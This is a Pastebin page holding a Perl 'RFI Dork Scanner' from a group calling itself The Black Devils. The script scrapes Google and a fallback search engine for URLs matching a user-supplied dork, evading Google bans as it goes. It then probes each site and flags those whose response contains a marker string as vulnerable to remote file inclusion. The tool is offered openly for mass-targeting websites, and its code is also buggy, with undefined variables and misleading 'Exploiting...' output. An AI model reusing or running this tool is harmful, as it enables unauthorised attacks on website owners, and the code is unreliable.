Advertisement
Googleinurl

The Black Devils RFI Dork Scanner V1.0 bY aSESINO04

Sep 2nd, 2013
653
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 4.11 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  3. #0     _                   __           __       __                     1
  4. #1   /' \            __  /'__`\        /\ \__  /'__`\                   0
  5. #0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  6. #1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
  7. #0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  8. #1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
  9. #0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  10. #1                  \ \____/ >> Exploit database separated by exploit   0
  11. #0                   \/___/          type (local, remote, DoS, etc.)    1
  12. #1                                                                      1
  13. #0  [+] Site            : 1337day.com                                   0
  14. #1  [+] Support e-mail  : submit[at]1337day.com                         1
  15. #0                                                                      0
  16. #1               #########################################              1
  17. #0               I'm The Black Devils member from Inj3ct0r Team         1
  18. #1               #########################################              0
  19. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  20. use LWP::UserAgent;
  21. use HTTP::Request;
  22.  
  23. $t = LWP::UserAgent->new() or die ("Error");
  24. $t->agent('Black-DevilsOS');
  25.  
  26. $temp = 'google_links.txt';
  27. $temp2 = 'temp2_links.txt';
  28.  
  29. system("title The Black Devils");
  30. system("color 1e");
  31. system("cls");
  32. print "\n\n";                
  33. print "    |=======================================================|\n";
  34. print "    |= [!] Name : The Black Devils RFI Dork Scanner V1.0 ||=|\n";
  35. print "    |= [!] Author  : The Black Devils                      =|\n";
  36. print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
  37. print "    |=======================================================|\n";
  38. sleep(2);
  39. print "\n";
  40.  
  41. print '[..] Insert Dork( allinurl:"page.php?doc=" ) : ';
  42. $text=<STDIN>;
  43. print "[..] Start Scanning For $text\n";
  44. print "[..] Note : This Scan will take some times...\n";
  45.  
  46. for ($i = 0;$i <= 900;$i += 100){
  47. $g = "http://google.com/search?q=".$text."&num=100&hl=en&as_qdr=all&start=".$p."&sa=N";
  48. $go = $t->request(HTTP::Request->new(GET=>$g));
  49. if ($go =~/Results/){
  50. open(r1,">>",$temp);
  51. $tx = $go->content;
  52. print r1 "$tx\n";
  53. close(r1);
  54. g2();
  55. }else{
  56. print "[..] Banned By Google or No Connection, Trying to Bypass...\n";
  57. g3();
  58. }
  59.  
  60. sub g2(){
  61. print "Started searching for site...\n";
  62. open ("r2", $temp);
  63. @rs = <r2>;
  64. close(r2);
  65. chomp(@rs);
  66. unlink($temp);
  67. foreach $re(@rs){
  68. while ($re=~ m/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/g) {
  69. open(r2,">>",$temp2);
  70. print r2 "$2\n";
  71. close(r2);
  72. }
  73. }
  74.  
  75. open ("r3", $temp2);
  76. @rs2 = <r3>;
  77. close(r3);
  78. chomp(@rs2);
  79.  
  80. unlink($temp2);
  81.  
  82. foreach $re2(@rs2){
  83. $url = "$re2$id?";
  84. $t->timeout(4);
  85. $o = $t->request(HTTP::Request->new(GET=>$url));
  86. $r = $o->content;
  87. if ($r =~/XShimeX/){
  88. $j++;
  89. print "[~] RFI Vulnerable:\n$url\n";
  90. }else{
  91. $nv++;
  92. print "[o] Exploiting...\n"
  93. }
  94. }
  95. }
  96. }
  97.  
  98. sub g3(){
  99. print "[..] Bypass Started...\n";
  100. for ( $i = 0; $i <= 1000; $i += 10 ) {
  101. $url = "http://euroseek.com/system/search.cgi?language=en&mode=internet&start=".$i."&string=".$text."";
  102. $eu = $t->request(HTTP::Request->new(GET=>$url));
  103. $tx = $eu->content;
  104. open (ooo,">>",$temp);
  105. print ooo "$tx";
  106. close(ooo);
  107.  
  108. open ("ooo", $temp);
  109. @tex = <ooo>;
  110. close(ooo);
  111. chomp(@tex);
  112.  
  113. unlink($temp);
  114.  
  115. foreach $tu(@tex){
  116. while ($tu =~ m/<a href="(.+?)" class="searchlinktitle"/g ) {
  117. open (ooo,">>",$temp2);
  118. print ooo "$1\n";
  119. close(ooo);
  120. }
  121. }
  122. open ("oooo", $temp2);
  123. @rs3 = <oooo>;
  124. close(oooo);
  125. chomp(@rs3);
  126.  
  127. unlink($temp2);
  128.  
  129. foreach $re3(@rs3){
  130. $url = "$re3$id?";
  131. $t->timeout(4);
  132. $o1 = $t->request(HTTP::Request->new(GET=>$url));
  133. $r = $o1->content;
  134. if ($r =~/XShimeX/){
  135. print "[-] RFI Vulnerable:\n$url\n";
  136. $j++;
  137. }else{
  138. $nv++;
  139. print "[o] Exploiting...\n"
  140. }
  141. }
  142. }
  143. }
  144. print "[..] Scanning Finish\n";
  145. print "[..] Total Vulnerable : $j\n";
  146. print "[..] Total Not Vulnerable : $nv\n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement